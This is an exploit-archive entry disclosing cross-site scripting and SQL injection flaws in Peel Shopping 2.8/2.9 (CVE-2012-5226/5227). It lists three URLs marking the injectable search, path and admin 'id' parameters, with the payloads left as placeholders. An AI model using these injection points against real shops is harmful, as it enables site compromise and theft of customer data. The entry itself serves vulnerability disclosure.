[] NeoSense
E X P L O I T S
title author type platform port cve id

Peel Shopping 2.8/ 2.9 - Cross-Site Scripting / SQL Injections

Author: Cyber-Crystal
type: webapps
platform: php
port: 
date_added: 2012-01-26 
date_updated: 2017-01-04 
verified: 0 
codes: OSVDB-82328;OSVDB-82327;OSVDB-82325;CVE-2012-5227;CVE-2012-5226 
tags: 
aliases:  
screenshot_url:  
application_url: 
+-------------------------------------------------------------------------+
# Exploit Title : Peel SHOPPING - version 2.8 and version 2.9 xss/sql inject Vulnerability
# version       : v2.9
# Author        : Cyber-Crystal
# Date          : n/a
# Software Link : http://www.peel.fr/ || or http://www.easy-script.com/scripts-PHP/peel-v29-4308.html
+-------------------------------------------------------------------------+


[+] Exploits

http://localhost/peel/index.php/achat/recherche.php?motclef=[Xss Here ]&action=Rechercher

http://localhost/peel/administrer/tva.php?mode=modif&id=[SQL]

http://localhost/peel/index.php/[XSS]





# The End //
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.